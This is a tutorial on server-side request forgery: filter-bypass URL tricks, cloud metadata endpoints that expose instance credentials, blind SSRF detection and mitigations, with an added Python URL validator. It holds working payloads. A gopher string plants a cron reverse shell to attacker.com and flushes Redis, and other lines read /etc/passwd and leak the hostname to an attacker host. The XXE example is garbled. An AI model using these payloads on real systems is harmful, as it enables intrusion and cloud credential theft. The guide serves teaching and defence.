
SSRF Exploitation: Bypassing Filters & Cloud Metadata Attacks
Complete guide to Server-Side Request Forgery with advanced bypass techniques and cloud instance exploitation
Introduction to SSRF
Server-Side Request Forgery (SSRF) is a vulnerability that lets an attacker make the server issue requests to internal or external resources on their behalf. This can lead to:
- Internal network enumeration
- Cloud metadata exposure
- Remote code execution
- Sensitive data disclosure
Basic SSRF Exploitation
Common SSRF Vectors
Vector | Example | Risk |
---|---|---|
URL Parameters | image?url=http://attacker.com | External interaction |
File Uploads | PDF generators, image processors | Internal network access |
Webhooks | callback URLs | Internal service interaction |
Bypassing SSRF Filters
1. URL Obfuscation Techniques
# Using alternative IP formats
http://2130706433/ (127.0.0.1)
http://0x7f000001/ (127.0.0.1)
http://0177.0000.0000.0001/ (127.0.0.1)
# Using URL parser confusion (userinfo and fragment)
http://localhost@attacker.com
http://attacker.com#localhost
# Using URL encoding
http://%6c%6f%63%61%6c%68%6f%73%74 (localhost)
http://%31%32%37%2e%30%2e%30%2e%31 (127.0.0.1)
2. Protocol Switching
# Using file protocol
file:///etc/passwd
# Using gopher protocol (for Redis, Memcached, etc.)
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
# Using dict protocol (for Redis, Memcached, etc.)
dict://127.0.0.1:6379/info
Cloud Metadata API Exploitation
AWS Metadata Service
The AWS instance metadata service (IMDSv1 and IMDSv2) exposes sensitive instance information, including temporary credentials:
# Classic metadata endpoint (v1)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/identity-credentials/ec2/security-credentials/ec2-instance/
# IMDSv2 (requires token)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
Bypassing IMDSv2: because the session token must first be obtained with a PUT request, a plain GET-based SSRF normally cannot reach IMDSv2. Some applications, however, automatically include the token header when making outbound requests, which reopens the path.
Google Cloud Metadata
GCP metadata endpoint contains similar sensitive information:
# Standard metadata endpoint
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# With required header
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
Azure Metadata Service
Azure metadata endpoint provides instance information:
# Azure metadata endpoint
http://169.254.169.254/metadata/instance?api-version=2020-06-01
# With required header
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2020-06-01"
Blind SSRF Techniques
1. Time-Based Detection
Use response times to identify internal services:
# Test for open ports
http://internal-service:22
http://internal-service:80
http://internal-service:443
# Compare response times
- Fast response: Port likely open
- Slow response: Port likely filtered
- Timeout: Port likely closed
2. DNS Exfiltration
Use DNS lookups to leak data:
# Leak data by embedding it in a hostname the server must resolve
http://secret.attacker-controlled.com/
# The server's resolver then queries the attacker's authoritative DNS for:
secret.attacker-controlled.com
3. Out-of-Band (OOB) Techniques
Use external services to detect interactions:
# Using Burp Collaborator
http://xyz.burpcollaborator.net
# Using interactsh
http://xyz.interact.sh
# Using DNS callback
http://attacker.com/$(hostname).xyz
Advanced Exploitation
1. Chaining with XXE
]>
&xxe;
2. Port Scanning Internal Networks
# Using HTTP redirects
http://target.com/redirect?url=http://192.168.1.1:22
# Using different protocols
dict://192.168.1.1:22/
Mitigation Techniques
For Developers:
- Implement allowlists for user-supplied URLs (scheme, host, and port)
- Use a proper URL parsing library, then validate the resolved IP address rather than pattern-matching the raw URL string, and re-validate on every redirect
- Disable unused protocols (file, gopher, dict)
- Enforce authentication for metadata services (for example, require IMDSv2 on AWS) and block the metadata address from application egress
- Use network segmentation so application hosts cannot reach internal services they do not need
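The following validator is an added example (not code from the original article) of the "proper URL parsing plus resolved-IP validation" advice above: it rejects every bypass form listed earlier on this page (decimal, hex and octal IP literals, userinfo and fragment tricks, percent-encoded hosts, non-HTTP schemes) and the cloud metadata addresses. The `FAKE_DNS` table and the `resolve` hook are constructed stand-ins so it runs offline; the hostnames and the public address 1.2.3.4 are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # file:, gopher:, dict: rejected outright

# Constructed stand-in for DNS so the example runs offline. In production use
# socket.getaddrinfo, then connect to the validated IP (not the hostname).
FAKE_DNS = {
    "localhost": ["127.0.0.1"],
    "metadata.google.internal": ["169.254.169.254"],
    "cdn.example.org": ["1.2.3.4"],  # constructed public address
}

def _literal_ip(host):
    """Parse `host` as the C library would: inet_aton accepts the decimal, hex
    and octal spellings used to slip past string filters; then try IPv6."""
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        pass
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None

def validate_fetch_url(url, resolve=lambda h: FAKE_DNS.get(h, [])):
    """Return (ok, reason, ip). Call it again on every redirect hop."""
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 bracket syntax
        return False, "unparseable URL", None
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme '{parts.scheme}' not allowed", None
    if parts.username is not None or parts.password is not None:
        return False, "userinfo (user@host) not allowed", None
    if parts.fragment:
        return False, "fragment not allowed", None
    host = parts.hostname
    if not host or "%" in host:  # refuse percent-encoded hostnames
        return False, "missing or encoded host", None
    literal = _literal_ip(host)
    targets = [literal] if literal else [_literal_ip(a) for a in resolve(host)]
    if not targets or None in targets:
        return False, f"host '{host}' does not resolve", None
    for ip in targets:
        ip = getattr(ip, "ipv4_mapped", None) or ip  # unwrap ::ffff:a.b.c.d
        if not ip.is_global:
            return False, f"'{host}' resolves to non-public {ip}", None
    return True, "ok", str(targets[0])
```

The HTTP client that performs the fetch should have automatic redirects disabled so each hop passes through this check before being followed.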
For Pentesters:
Always test for SSRF in any functionality that makes external requests. Pay special attention to file processors, webhooks, and URL fetching features.
Conclusion
SSRF remains one of the most dangerous web vulnerabilities, especially in cloud environments. Understanding bypass techniques and cloud metadata services is crucial for both attackers and defenders.